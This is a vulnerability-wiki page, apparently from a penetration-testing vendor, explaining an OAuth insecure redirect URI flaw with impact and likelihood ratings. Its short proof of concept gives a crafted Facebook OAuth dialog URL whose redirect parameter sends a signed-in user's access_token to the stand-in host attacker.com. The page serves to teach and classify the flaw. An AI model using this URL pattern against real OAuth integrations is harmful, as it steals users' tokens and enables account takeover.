Menu Icon

Cobalt Vulnerability Wiki

Cobalt Vulnerability Wiki

Categories

Toggle Arrow IconV2 - AuthenticationToggle Arrow IconV3 - Session ManagementToggle Arrow IconV4 - Access Control
Account takeover via "Forgot your password" functionality Admin panel publicly accessible Admin panel takeover AWS bucket misconfiguration Critically Sensitive Data - Password Disclosure Critically Sensitive Data - Private API KeysCSRF Database Management System (DBMS) Misconfiguration:Excessively Privileged User / DBA Directory Listing Enabled EXIF Geolocation Data Not Stripped From Uploaded Images - User Enumeration Insecure crossdomain.xml policy OAuth Account Takeover OAuth Insecure Redirect URI OAuth Missing/Broken State Parameter Sensitive Token in URL Token Leakage via Referer Weak Password Reset Implementation - Token Leakage via Host Header Poisoning
Toggle Arrow IconV5 - Validation/SanitizationToggle Arrow IconV6 - CryptographyToggle Arrow IconV7 - Error LoggingToggle Arrow IconV8 - Data ProtectionToggle Arrow IconV9 - CommunicationsToggle Arrow IconV10 - Malicious CodeToggle Arrow IconV11 - Business LogicToggle Arrow IconV12 - Files ResourcesToggle Arrow IconV13 - APIToggle Arrow IconV14 - Config
Arrow Left

V4 - Access Control

OAuth Insecure Redirect URI

POC

1.) Sign-in to a Facebook linked account.


2.) Visit: https://www.facebook.com/v2.8/dialog/oauth?app_id=xxxx&client_id=xxxxx&display=popup&domain=xxxxxx&e2e=%7B%7D&locale=en_US&origin=1&redirect_uri=xxxxx/login?next_action=//attacker.com&response_type=token&scope=public_profile%2Cemail&sdk=joey&version=v2.8


3.) You'll be redirected to attacker.com and your access_token will be leaked.




Impact

Medium-High (depends on information disclosure)



Likelihood

Medium-High


Ready to get started?

our platformschedule a demo
Aircall logoAlgolia logoCangageCredit KarmaDattoEgnyteHubspotMovinimageMulesoftPendoSentaraSmarshSnowSolarisTalkdeskVerifoneKubraAxel SpringerNuna

Join some of these great clients we're proud to have helped